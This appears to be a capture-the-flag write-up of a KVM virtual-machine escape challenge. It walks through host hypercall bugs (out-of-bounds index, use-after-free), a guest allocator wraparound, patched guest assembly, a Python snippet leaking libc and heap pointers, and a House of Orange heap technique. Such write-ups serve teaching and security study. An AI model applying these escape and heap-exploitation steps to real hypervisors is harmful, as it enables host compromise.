                if (ioctl(vcpu, KVM_GET_REGS, &regs) == -1)
                    puts("Error get regs!");

                switch (regs.rax) {

                    case 0x101:
                        free_memory(regs.rbx, regs.rcx);
                        break;
                    case 0x102:
                        copy_memory(regs.rbx, regs.rcx, regs.rdx, guest_memory);
                        break;
                    case 0x100:
                        alloc_memory(regs.rbx);
                        break;
                    default:
                        puts("Function error!");
                        break;
                }
           }
           continue;
VM exits caused port I/O ( KVM_EXIT_IO) are handled to read and write data using stdin/stdout. Three interesting hypercalls are implemented on top of KVM_EXIT_DEBUG event.

Host Bugs:

A. The array that manages host allocations and size, can be accessed out of bound by all 3 hypercalls (free_memory, copy_memory, alloc_memory) Below is the code from alloc_memory
     /* index can take the value 16 here when going out of loop */
     for (index = 0; index <= 0xF && allocations[index]; ++index);

     mem = malloc(size);

     if (mem) {
         allocations[index] = mem;        // out of bounds access
         alloca_size[index] = size;       // can overwrite allocations[0]
         ++number_of_allocs;

This bug is less interesting for exploitation, since there is an use-after-free which gives better primitives

B. The hypercall for freeing memory has an option to free a pointer but not clear the reference. However the guest code enables to access only case 3.
        if (index <= 16) {               // out of bound access

                switch (choice) {

                        case 2:
                                free(allocations[index]);
                                allocations[index] = 0;
                                // can be decremented arbitrary number of times
                                --number_of_allocs;                     
                                break;
                        case 3:
                                free(allocations[index]);
                                allocations[index] = 0;
                                alloca_size[index] = 0;
                                // can be decremented arbitrary number of times
                                --number_of_allocs;                     
                                break;
                        case 1:
                                // double free/UAF as pointer is not set to NULL
                                free(allocations[index]);               
                                break;
                }
        } 
This UAF can be further exercised in the hypercall to copy memory between guest and host
    if (size <= alloca_size[index]) {
        if (choice == 1) {
            // write to freed memory due to UAF
            memcpy(allocations[index], guest_memory + 0x4000, size);        
        }
        else if (choice == 2) {
            // read from uninitialized or freed memory
            memcpy(guest_memory + 0x4000, allocations[index], size);        
        }
    } 
Guest Bug:

Though the host code has UAF, this bug cannot be triggered using the guest code thats currently under execution. Hence we need to achieve code execution in the guest before trying for a VM escape. The guest code starts at address 0. It initializes the stack pointer to 0x3000
seg000:0000                 mov     sp, 3000h
seg000:0003                 call    main
seg000:0006                 hlt
The guest code to allocate memory in guest looks like below:
seg000:007E                 mov     ax, offset size_value
seg000:0081                 mov     bx, 2           ; get 2 byte size
seg000:0084                 call    inb
seg000:0087                 mov     ax, ds:size_value
seg000:008A                 cmp     ax, 1000h       ; check if size < 0x1000
seg000:008D                 ja      short size_big
seg000:008F                 mov     cx, ds:total_bytes
seg000:0093                 cmp     cx, 0B000h
seg000:0097                 ja      short guest_mem_full
seg000:0099                 mov     si, word ptr ds:nalloc
seg000:009D                 cmp     si, 16          ; check the number of allocations made
seg000:00A0                 jnb     short too_many_allocs
seg000:00A2                 mov     di, cx
; move beyond stack@0x3000 and host shared_mem@0x4000, but this can wrap
seg000:00A4                 add     cx, 5000h       
seg000:00A8                 add     si, si
seg000:00AA                 mov     ds:address_array[si], cx ; save address
seg000:00AE                 mov     ds:size_array[si], ax ; save size
seg000:00B2                 add     di, ax
seg000:00B4                 mov     ds:total_bytes, di
seg000:00B8                 mov     al, ds:nalloc
seg000:00BB                 inc     al
seg000:00BD                 mov     ds:nalloc, al

The guest uses the following memory region:
text region  @ 0x0
stack bottom @ 0x3000
shared memory @ 0x4000
heap @ 0x5000 – 0x5000+0xB000
The guest memory allocator starts at address 0x5000 and checks for maximum memory limit allocated being 0xB000. However the check total_bytes + 0x5000 can wrap to 0 during 16-bit addition. This allocation at address 0, allows to overwrite guest code with arbitrary code. Now the vulnerable hypercall paths in host can be triggered from guest.

Exploitation:

I didn’t overwrite the entire guest code, but extended its functionality with the following changes to set bx with user supplied values during vmcall
seg000:0058 _free_memory:                           ; CODE XREF: main+2A↑j
seg000:0058                 call    get_choice
seg000:005B                 jmp     short loop
seg000:01A3                 call    set_choice
seg000:01A6                 mov     cl, ds:index    ; index
seg000:01AA                 mov     dx, ds:size_value
seg000:01AE                 vmcall
 
seg000:01DF                 mov     ax, 101h        ; free
seg000:01E2                 call    set_choice
seg000:01E5                 mov     cl, ds:index
seg000:01E9                 vmcall
seg000:0386 choice          dw 0                    ; DATA XREF: get_choice+B↓o
seg000:0386                                         ; set_choice↓r
seg000:0388
seg000:0388 get_choice      proc near               ; CODE XREF: main:_free_memory↑p
seg000:0388                 push    ax
seg000:0389                 push    bx
seg000:038A                 mov     ax, (offset aElcomeToTheVir+0B7h) ; 
seg000:038D                 mov     bx, 0Ch
seg000:0390                 call    outb
seg000:0393                 mov     ax, offset choice
seg000:0396                 mov     bx, 1
seg000:0399                 call    inb
seg000:039C                 pop     bx
seg000:039D                 pop     ax
seg000:039E                 retn
seg000:039E get_choice      endp
seg000:039E
seg000:039F set_choice      proc near               ; CODE XREF: update_host_memory+4C↑p
seg000:039F                                         ; free_host_memory+1F↑p
seg000:039F                 mov     bx, ds:choice
seg000:03A3                 retn
seg000:03A3 set_choice      endp
Leaking libc and heap pointers:

Since unsorted chunk freelist pointers can be read using UAF, this leaks arena and heap pointers. Allocate 4 chunks, free alternate chunks to prevent coalescing and read the pointers using UAF as below:
for x in range(4):
    allocate_host_memory(256)

free_host_memory(0, INVALID_FREE)
free_host_memory(2, VALID_FREE) 

copy_memory(256, 0, 'A'*256, COPY_FROM_HOST)
heap_mem = p.recvn(0x1000)
Getting code execution:

House of Orange works for this situation. Create a large chunk and free it, but hold reference to the pointer. Later use this reference to overwrite the top chunk to gain code execution. The flag in rwctf format was WoW_YoU_w1ll_B5_A_FFFutuRe_staR_In_vm_E5c4pe. The exploit for the challenge can be found here

References: Using the KVM API, House of Orange